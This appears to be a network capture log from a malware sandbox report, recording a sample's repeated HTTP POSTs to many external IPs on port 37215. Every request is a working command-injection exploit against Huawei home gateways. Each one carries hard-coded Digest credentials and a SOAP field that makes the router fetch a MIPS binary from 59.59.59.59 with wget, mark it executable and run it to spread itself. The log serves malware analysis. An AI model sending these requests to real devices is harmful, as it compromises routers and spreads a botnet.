                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1623192.168.2.155837241.39.46.21337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.900433064 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1624192.168.2.1551048157.39.24.1237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.900490046 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1625192.168.2.1535584157.160.31.18537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.900510073 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1626192.168.2.1535106197.254.99.4637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.900537014 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1627192.168.2.1553000197.178.238.1237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.904772997 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1628192.168.2.1558432185.148.149.5037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.904951096 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1629192.168.2.1536380197.30.225.6337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.904977083 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1630192.168.2.1550566197.244.199.1237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.905009031 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1631192.168.2.1554156156.146.172.2337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.905100107 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1632192.168.2.1545078197.21.43.16537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.905462980 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
